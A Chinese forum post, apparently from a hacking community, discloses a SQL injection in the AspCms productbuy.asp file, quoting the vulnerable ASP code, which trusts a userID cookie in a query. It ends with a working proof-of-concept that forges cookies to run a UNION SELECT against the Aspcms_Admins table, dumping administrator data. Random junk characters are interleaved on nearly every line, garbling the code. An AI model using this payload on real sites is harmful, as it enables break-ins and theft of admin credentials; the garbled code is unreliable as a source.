好久没上土司了,上来一看发现在删号名单内.....( Z+ ]$ `9 M; R7 w1 l& I
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
3 `* V h( Z8 R2 s# |: E2 }9 A! [废话不多说,看代码:/ u5 ]* O- y% z) A/ S2 |- Z5 H
, t b8 a, H! r, m: d% a0 |<%7 m( p- `- o# k, q; ^
: h3 I" Q2 G) q4 P# Jif action = "buy" then" w) X' u K. T/ L* h
7 r$ S# G; l/ u9 A/ M addOrder()
7 y3 |! t% g' |) y/ @: U t" d
- f& }* _6 P2 Z" \0 ^2 H, Delse
9 ?8 n4 k- C, [# N. y& s7 ^9 \& |. l( {0 G5 ?" q
echoContent()5 R* G; z2 [1 \, N* t
. O& B8 ?$ s; W# R' f; ^7 r4 k I; w
end if2 [. _' x( M' y% i
1 J$ r3 b: A D, L+ `( s
" U3 U! [# s; t7 J& x# l. }$ G
" I" L+ T7 w0 f' g5 C……略过
& X7 {) j% j" c5 h5 {, ^# z, m- y; y1 R
' I4 c/ S7 H. N3 K, K- U0 O/ K6 v& v0 D, z5 @7 o- D
Sub echoContent()2 s6 B4 o. S) W
: [0 T8 T6 s4 h4 j2 R* A, ^
dim id
/ x8 T4 \! \/ D+ _4 j) ]9 ~0 I" V2 d8 [1 m& V; @
id=getForm("id","get")
6 p' ^5 C( ~9 A! a; d
, z8 V1 o b# h' O7 R+ {0 Z
) e+ v! B2 `& l1 j* t i3 [& d% s' v, L( \" }
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 1 X r5 O1 b- n2 V- n7 h
9 ?( ]2 D/ Y% G
, v, s! c+ e: {$ r9 V, C- h- b5 Y( O! m
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
/ n5 v/ T8 t+ I
; }0 N0 H" s; l( x1 o: Y dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
3 v. w- y2 M [4 `0 F* \
1 A8 ~9 Z$ K+ @/ w# B9 K- r Dim templatePath,tempStr
1 c7 R- W1 S7 P/ L: I( Q0 Q8 U# K* T
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
" I0 N: J, _, x' T7 X% ?0 A7 j! p0 J
" K" U: S/ |8 ~" X
0 }) X; j6 @% T7 j set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
4 y; A3 x8 T) Y1 t# W. F
$ u$ A) W6 ]2 D: m selectproduct=rsObj(0)6 x& T8 ?4 [' I* q5 j2 h7 T, R
3 {8 u& z3 ~' u" F
+ t0 U5 T& ~* W7 w; O; L8 R/ ^
9 M1 k" r3 w5 C6 A Dim linkman,gender,phone,mobile,email,qq,address,postcode
% k0 L% b- M- i
% Q5 y K; ?2 `' N0 b if isnul(rCookie("loginstatus")) then wCookie"loginstatus",0
+ ]1 Y. k; C, S0 I
1 t1 y F( Q4 ` M if rCookie("loginstatus")=1 then
, l3 l0 G l) f. M, }6 N5 G* u# J7 Q* n
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")/ ~# P, }) H% N
- ^6 j4 _4 H- N" K$ _: G# T0 r linkman=rsObj("truename")
5 h Y/ t, I% E! H
5 |+ P' }8 E( e! s6 u: @ gender=rsObj("gender")
, K% R, b" u, j0 M
3 t8 r% N4 Z8 v5 T8 U# \3 H% K phone=rsObj("phone") a& b( g3 o4 x+ a; u. M' g7 _
. A- k! [ l# a' L. M8 `. y! x mobile=rsObj("mobile")
* n* c; M; ?1 q% h9 w: g7 _0 d6 |$ x+ M" o, {
email=rsObj("email")1 }* Z" m0 j6 ^9 c, T, A
3 G( N- S7 l6 t# c( E) Z- ~
qq=rsObj("qq")
3 A: Z. D3 f/ D5 B( m( ?6 H
; O6 Q7 N- \$ u( x' ~ address=rsObj("address")4 F! H. ^! K& M9 G8 W( P
8 @: ^3 Z L1 T$ n
postcode=rsObj("postcode")0 S9 H9 i; v2 m; T$ n0 G; h
[3 P% W: z( M" d
else : D* y+ G( i0 |7 n$ R# K
, s' X+ ]+ _& b3 r; t) X- y/ q6 h
gender=1" R5 q2 q, y7 a ?1 r F
5 m. d/ G+ s+ M) t, `+ o' k( U+ g end if
: V6 k$ `9 F- X1 H3 B+ n6 p
$ Y; p' K8 S6 U2 K! G rsObj.close()( p; W4 m/ r% e
+ e4 V6 v0 _ Z9 {3 M: ?3 A
' _& e& u' I# Y/ k4 w4 V9 X" E2 ]' j
with templateObj
' S3 M/ ~4 k; k% I" [" t) K6 N) V+ Z0 B: d
.content=loadFile(templatePath)
" Q" z! v: h4 ~0 s- a' R$ S+ x/ Z0 g) n7 g$ @9 w7 H
.parseHtml()% y! P& V8 k! K# n% a; \' o
& h" D z# J. p; x% S3 H .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)! ?2 R0 x( @4 ^. L
0 r7 B& g/ {9 q! e0 z
.content=replaceStr(.content,"[aspcms:linkman]",linkman) $ Q: K* G; C1 I$ m& H
+ j' H' K4 x0 V. p6 _3 b6 } .content=replaceStr(.content,"[aspcms:gender]",gender) " H& X4 i5 c* Q' C0 ~
% ^+ R8 c& \. e9 ~2 |! i' N .content=replaceStr(.content,"[aspcms:phone]",phone) & m# S7 b, s; u. u# e
_7 `4 A) p0 _: V" d9 H
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
7 I* x& L: K/ Q. N3 a! d8 C8 o' ~+ ^8 [
.content=replaceStr(.content,"[aspcms:email]",email) 3 R) ^$ I$ {5 e3 i8 }
2 }5 e$ X+ g3 h X% D; C4 s
.content=replaceStr(.content,"[aspcms:qq]",qq)
% A: ^; A; G/ q5 J! x& d9 k" e
. J# W* `* k- Y* U .content=replaceStr(.content,"[aspcms:address]",address)
& ^) Q5 Q/ s. ?# b! ?
' v- y! h( h6 S" N .content=replaceStr(.content,"[aspcms:postcode]",postcode) . S! F$ n! j# ?( L7 G7 N/ U
% K. C5 I2 Q& [8 l" `
.parseCommon() & ?3 t6 p2 q! I0 C
; J6 ?, W0 u8 P' }' H% V) q; ] }
echo .content 6 ^! u2 ^* T+ h" O( J
) j3 X' _/ r, F' C end with9 [% o# ]6 j+ @! h1 p+ N
5 V' _/ I8 y# b5 F set templateobj =nothing : terminateAllObjects
- E; ?8 \6 K4 P o* ^. j/ O# B z- p
End Sub
+ d& ~7 R, r: S7 T0 @. p Z$ U漏洞很明显,没啥好说的
. `5 x- i, H$ u) P7 f. {, Vpoc:0 C2 Z6 b) H8 D( P' y( G$ `* n
" g5 P5 [6 f# ~3 [! c$ Y* U
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
5 p( w9 p% }0 X9 A+ j: B- {1 [# z6 ^: F
|